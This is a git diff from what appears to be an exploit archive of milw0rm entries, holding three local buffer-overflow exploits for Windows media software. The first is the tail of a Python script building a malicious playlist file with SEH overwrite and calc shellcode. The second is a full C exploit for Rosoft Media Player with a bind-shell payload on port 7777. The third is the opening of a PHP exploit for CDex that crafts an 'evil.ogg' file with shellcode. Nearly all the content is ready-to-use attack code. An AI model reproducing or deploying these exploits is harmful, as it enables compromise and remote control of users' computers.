+seh = "\x08\x2A\x01\x10"
+
+
+header1= "\x22\x65\x78\x70\x6C\x6F\x69\x74\x2E\x6D\x70\x33\x22\x20\x30\x0A\x22\x43\x3A\x5C"
+header2= "\x2E\x6D\x70\x33\x22"
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
+shellcode = (
+	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+	"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67"
+	"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32"
+	"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b"
+	"\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c"
+	"\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74"
+	"\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37"
+	"\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f"
+	"\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b"
+	"\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38"
+	"\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44"
+	"\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47"
+	"\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f"
+	"\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39"
+	"\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37"
+	"\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b"
+	"\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31"
+	"\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b"
+	"\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71"
+	"\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72"
+	"\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67"
+    )
+
+	
+exploit = header1 + buff + next_seh + seh + shellcode + header2
+
+try:
+    out_file = open("rainbow.rpl",'w')
+    out_file.write(exploit)
+    out_file.close()
+    print "Exploit file created!\n"
+except:
+    print "Error"
+
+# milw0rm.com [2009-03-10]
diff --git a/platforms/windows/local/8214.c b/platforms/windows/local/8214.c
index 3cccb6b0a..4e318fcd3 100755
--- a/platforms/windows/local/8214.c
+++ b/platforms/windows/local/8214.c
@@ -1,186 +1,186 @@
-/* rsmpf.c
-*  Rosoft media player free local buffer overflow Exploit multi targets
-* Coded By :
-*               SimO-s0fT         (Maroc-anti-connexion@hotmail.com)
-*  thanks To  :  Stack & fl0 fl0w & SKD 
-*  and special thanks to str0ke for his advices and support ( you are the best brotha )
-*  example :
-*           ##########################################################################################
-            #   Coded By SimO-s0fT                                                                   #
-*           #   0                [*]Microsoft Windows Trust SP3 (Frensh):ESP                         #
-*           #   1                [*]Microsoft Windows Trust SP2 (Frensh):ESP                         #
-*           #   2                [*]Microsoft Windows XP SP3 (Frensh) : ESP                          # 
-*           #   3                [*]Microsoft Windows XP SP2 (Frensh) : ESP                          #
-*           #    USAGE :                                                                             #
-*           #        exploit1.exe file.rml platform                                                  #
-*           #    more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }             #
-*           #   failed...: No such file or directory                                                 #
-*           #   C:\Documents and Settings\The Fanopsis\Bureau>exploit1 simo.rml 0                    #
-*           #   [1] execute calc.exe                                                                 #
-*           #   [2] execute bindshell LPORT=7777                                                     #
-*           #   Choose a neumber : 2                                                                 #
-*           #   simo.rml has been created!                                                           #
-*           #   C:\Documents and Settings\The Fanopsis\Bureau>telnet 41.250.22.124 7777              #
-*           #   Console - Windows Trust 3.0 (Service Pack 3: v55                                     #
-*           #                                                                                        #  
-*           #   (C) 1985-2008 Microsoft Corp.                                                        #
-*           #                                                                                        #
-*           #                                                                                        #
-*           #   C:\Documents and Settings\The Fanopsis\Bureau>                                       #
-*           ##########################################################################################
-*               
-********************************************************************************************************/
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-#define OFFSET 4096
-
-// calc (pour tester l'exploit)
-char scode1[]=
-            "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
-            "\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
-            "\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
-            "\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
-            "\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
-            "\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f"
-            "\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0"
-            "\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33"
-            "\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f"
-            "\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23"
-            "\xcc\x21\xdb\x5b";
-//bind shell LPORT 7777
-char scode2[] =
-           "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-           "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
-           "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
-           "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
-           "\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
-           "\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
-           "\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
-           "\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
-           "\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
-           "\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
-           "\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
-           "\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
-           "\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
-           "\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
-           "\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
-           "\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
-           "\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
-           "\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
-           "\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
-           "\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
-           "\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
-           "\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
-           "\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
-           "\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
-           "\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
-           "\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
-           "\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
-           "\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
-           "\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
-           "\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
-           "\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
-           "\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
-           "\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
-           "\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
-           "\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
-           "\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
-           "\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
-           "\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
-           "\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
-           "\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
-           "\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
-           "\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
-           "\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
-           "\x6f\x58\x56\x49\x6f\x78\x50\x61";
- 
-struct adresses
-               {char *platform;
-               unsigned long addr;
-               }
-                systems[]=
-                {
-                          {"[*]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB             },
-                          {"[*]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569             },
-                          {"[*]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B             },
-                          {"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D             },
-                          {NULL                                                                 },
-                };
-                         
-char NOP1[]="\x90\x90\x90\x90";// n0t working
-char NOP2[]="\x90\x90\x90\x90\x90\x90\x90\x90";
-int main(int argc,char *argv[]){
-    FILE *s;
-    unsigned char *buffer;
-    unsigned int RET= systems[atoi(argv[2])].addr;
-    unsigned char bchars[]="\xF0\xFF\xFD\x7F";
-    int i;
-    int number;
-    int offset=0;
-   
-    if (argc <2){
-             system("cls");
-             printf("Coded By SimO-s0fT\n");
-             for(i=0;systems[i].platform;i++)
-             printf("%d \t\t %s\n",i,systems[i].platform);
-             printf("USAGE : \n\t");
-             printf(argv[0]);
-             printf(".exe ");
-             printf("file.rml ");
-             printf("platform\n");
-             printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }\n");
-             }
-    if ((s=fopen(argv[1],"wb"))==NULL){
-                                       perror("failed...");
-                                       exit(0);
-                                      }
-    printf("[1] execute calc.exe\n");
-    printf("[2] execute bindshell LPORT=7777\n");
-    printf(" Choose a neumber : ");
-    scanf("%d",&number);
-    switch(number){
-                   case 1:                     buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
-                                               memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
-                                               offset=OFFSET;
-                                               memcpy(buffer+offset,bchars,strlen(bchars));
-                                               offset+=strlen(bchars);
-                                               memcpy(buffer+offset,NOP1,strlen(NOP1));
-                                               offset+=strlen(NOP1);
-                                               memcpy(buffer+offset,&RET,4);
-                                               offset+=4;
-                                               memcpy(buffer+offset,NOP2,strlen(NOP2));
-                                               offset+=strlen(NOP2);
-                                               memcpy(buffer+offset,scode1,strlen(scode1));
-                                               offset+=strlen(scode1);
-                                               fputs(buffer,s);
-                                               fclose(s);
-                                               printf("%s has been created!",argv[1]);
-                                               free(buffer);
-                                               break;
-                  
-                   case 2:                     buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
-                                               memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
-                                               offset=OFFSET;
-                                               memcpy(buffer+offset,bchars,strlen(bchars));
-                                               offset+=strlen(bchars);
-                                               memcpy(buffer+offset,NOP1,strlen(NOP1));
-                                               offset+=strlen(NOP1);
-                                               memcpy(buffer+offset,&RET,4);
-                                               offset+=4;
-                                               memcpy(buffer+offset,NOP2,strlen(NOP2));
-                                               offset+=strlen(NOP2);
-                                               memcpy(buffer+offset,scode2,strlen(scode2));
-                                               offset+=strlen(scode2);
-                                               fputs(buffer,s);
-                                               fclose(s);
-                                               printf("%s has been created!",argv[1]);
-                                               free(buffer);
-                                               break;
-                                          
-                   }
-                  
-    return 0;
-}
-
-// milw0rm.com [2009-03-16]
+/* rsmpf.c
+*  Rosoft media player free local buffer overflow Exploit multi targets
+* Coded By :
+*               SimO-s0fT         (Maroc-anti-connexion@hotmail.com)
+*  thanks To  :  Stack & fl0 fl0w & SKD 
+*  and special thanks to str0ke for his advices and support ( you are the best brotha )
+*  example :
+*           ##########################################################################################
+            #   Coded By SimO-s0fT                                                                   #
+*           #   0                [*]Microsoft Windows Trust SP3 (Frensh):ESP                         #
+*           #   1                [*]Microsoft Windows Trust SP2 (Frensh):ESP                         #
+*           #   2                [*]Microsoft Windows XP SP3 (Frensh) : ESP                          # 
+*           #   3                [*]Microsoft Windows XP SP2 (Frensh) : ESP                          #
+*           #    USAGE :                                                                             #
+*           #        exploit1.exe file.rml platform                                                  #
+*           #    more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }             #
+*           #   failed...: No such file or directory                                                 #
+*           #   C:\Documents and Settings\The Fanopsis\Bureau>exploit1 simo.rml 0                    #
+*           #   [1] execute calc.exe                                                                 #
+*           #   [2] execute bindshell LPORT=7777                                                     #
+*           #   Choose a neumber : 2                                                                 #
+*           #   simo.rml has been created!                                                           #
+*           #   C:\Documents and Settings\The Fanopsis\Bureau>telnet 41.250.22.124 7777              #
+*           #   Console - Windows Trust 3.0 (Service Pack 3: v55                                     #
+*           #                                                                                        #  
+*           #   (C) 1985-2008 Microsoft Corp.                                                        #
+*           #                                                                                        #
+*           #                                                                                        #
+*           #   C:\Documents and Settings\The Fanopsis\Bureau>                                       #
+*           ##########################################################################################
+*               
+********************************************************************************************************/
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#define OFFSET 4096
+
+// calc (pour tester l'exploit)
+char scode1[]=
+            "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
+            "\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
+            "\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
+            "\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
+            "\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
+            "\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f"
+            "\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0"
+            "\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33"
+            "\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f"
+            "\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23"
+            "\xcc\x21\xdb\x5b";
+//bind shell LPORT 7777
+char scode2[] =
+           "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+           "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
+           "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
+           "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
+           "\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
+           "\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
+           "\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
+           "\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
+           "\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
+           "\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
+           "\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
+           "\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
+           "\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
+           "\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
+           "\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
+           "\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
+           "\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
+           "\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
+           "\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
+           "\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
+           "\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
+           "\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
+           "\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
+           "\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
+           "\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
+           "\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
+           "\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
+           "\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
+           "\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
+           "\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
+           "\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
+           "\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
+           "\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
+           "\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
+           "\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
+           "\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
+           "\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
+           "\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
+           "\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
+           "\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
+           "\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
+           "\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
+           "\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
+           "\x6f\x58\x56\x49\x6f\x78\x50\x61";
+ 
+struct adresses
+               {char *platform;
+               unsigned long addr;
+               }
+                systems[]=
+                {
+                          {"[*]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB             },
+                          {"[*]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569             },
+                          {"[*]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B             },
+                          {"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D             },
+                          {NULL                                                                 },
+                };
+                         
+char NOP1[]="\x90\x90\x90\x90";// n0t working
+char NOP2[]="\x90\x90\x90\x90\x90\x90\x90\x90";
+int main(int argc,char *argv[]){
+    FILE *s;
+    unsigned char *buffer;
+    unsigned int RET= systems[atoi(argv[2])].addr;
+    unsigned char bchars[]="\xF0\xFF\xFD\x7F";
+    int i;
+    int number;
+    int offset=0;
+   
+    if (argc <2){
+             system("cls");
+             printf("Coded By SimO-s0fT\n");
+             for(i=0;systems[i].platform;i++)
+             printf("%d \t\t %s\n",i,systems[i].platform);
+             printf("USAGE : \n\t");
+             printf(argv[0]);
+             printf(".exe ");
+             printf("file.rml ");
+             printf("platform\n");
+             printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }\n");
+             }
+    if ((s=fopen(argv[1],"wb"))==NULL){
+                                       perror("failed...");
+                                       exit(0);
+                                      }
+    printf("[1] execute calc.exe\n");
+    printf("[2] execute bindshell LPORT=7777\n");
+    printf(" Choose a neumber : ");
+    scanf("%d",&number);
+    switch(number){
+                   case 1:                     buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
+                                               memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
+                                               offset=OFFSET;
+                                               memcpy(buffer+offset,bchars,strlen(bchars));
+                                               offset+=strlen(bchars);
+                                               memcpy(buffer+offset,NOP1,strlen(NOP1));
+                                               offset+=strlen(NOP1);
+                                               memcpy(buffer+offset,&RET,4);
+                                               offset+=4;
+                                               memcpy(buffer+offset,NOP2,strlen(NOP2));
+                                               offset+=strlen(NOP2);
+                                               memcpy(buffer+offset,scode1,strlen(scode1));
+                                               offset+=strlen(scode1);
+                                               fputs(buffer,s);
+                                               fclose(s);
+                                               printf("%s has been created!",argv[1]);
+                                               free(buffer);
+                                               break;
+                  
+                   case 2:                     buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
+                                               memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
+                                               offset=OFFSET;
+                                               memcpy(buffer+offset,bchars,strlen(bchars));
+                                               offset+=strlen(bchars);
+                                               memcpy(buffer+offset,NOP1,strlen(NOP1));
+                                               offset+=strlen(NOP1);
+                                               memcpy(buffer+offset,&RET,4);
+                                               offset+=4;
+                                               memcpy(buffer+offset,NOP2,strlen(NOP2));
+                                               offset+=strlen(NOP2);
+                                               memcpy(buffer+offset,scode2,strlen(scode2));
+                                               offset+=strlen(scode2);
+                                               fputs(buffer,s);
+                                               fclose(s);
+                                               printf("%s has been created!",argv[1]);
+                                               free(buffer);
+                                               break;
+                                          
+                   }
+                  
+    return 0;
+}
+
+// milw0rm.com [2009-03-16]
diff --git a/platforms/windows/local/8231.php b/platforms/windows/local/8231.php
index 2e1b42461..cdfe11fe8 100755
--- a/platforms/windows/local/8231.php
+++ b/platforms/windows/local/8231.php
@@ -1,436 +1,436 @@
-<?PHP
-/*
-CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3)
-by Nine:Situations:Group::Pyrokinesis
-
-software site: http://cdexos.sourceforge.net/
-our site: http://retrogod.altervista.org/
-
-A very reliable buffer overflow exists in the way cdex process Ogg Vorbis Info
-headers.
-usage:
-c:\php\php 9sg_cdex_local.php
-evil.ogg is created, now navigate:
-Main Menu-> Tools -> Media file Player -> Select files -> Browse to a folder ->
--> Open -> Play evil.ogg
-*/
-
-$_frgmnt1 =
-"OggS".                             //for what I understood ... beginning
-"\x00".                             //stream_structure_version
-"\x02".                             //header_type_flag
-"\x00\x00\x00\x00\x00\x00\x00\x00". //granular_position
-"\x66\x07\x00\x00".                 //bitstream_serial_number
-"\x00\x00\x00\x00".                 //page_sequence_number
-"\x92\xa8\x3b\xd9".                 //CRC_checksum
-"\x01".                             //number_page_segments
-"\x1e".                             //segments_table
-"\x01".
-"vorbis".
-"\x00\x00\x00\x00\x02\x44\xac\x00\x00\x00\x00\x00\x00".
-"\x00\x71\x02\x00\x00\x00\x00\x00\xb8\x01";
-
-$_frgmnt2 =
-"OggS".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x07".
-"\x00\x00\x01\x00\x00\x00".
-"\x00\x00\x00\x00". //set crc to 0, after calculate the real crc
-"\x51\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\x93\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
-"\xff\xff\xff\xff\xff\xff\x03vorbis\x1d\x00\x00".
-"\x00Xiph.Org\x20libVor".
-"bis\x20I\x2020040629\x03\x00".
-"\x00\x00\x07\x20\x00\x00".
-"ARTIST=";
-
-$payload_len=8192;
-
-//msg box shellcode saying "hey" ...
-//replace with your own, the script recalculates the CRC checksum
-$scode =
-"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a".
-"\xbb\x7b\x1d\x80\x7c". //LoadLibraryA at 0x7c801d7b in kernel32.dll  xpsp3
-"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50".
-"\xbb\x30\xae\x80\x7c". //GetProcAddress at 0x7c80ae30 in kernel32.dll
-"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51".
-"\x51\x52\xff\xd0\x31\xd2\x50".
-"\xb8\xfa\xca\x81\x7c". //ExitProcess at 0x7c81cafa in kernel32.dll
-"\xff\xd0\xe8\xc4\xff".
-"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff".
-"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff".
-"\xff\x48\x65\x79\x4e";
-
-$_boom=str_repeat("\x90",2048 - strlen($scode)).$scode.
-"\x67\x86\x86\x7c".  //eip -> 0x7C868667      call esp kernel32.dll
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
-"\x83\xec\x7f". // sub esp,07f
-"\x83\xec\x7f". //..
-"\x83\xec\x7f". //..
-"\x83\xec\x7f". //..
-"\x83\xec\x7f". //..
-"\xff\xd4". //call esp
-"\x90\x90\x90".
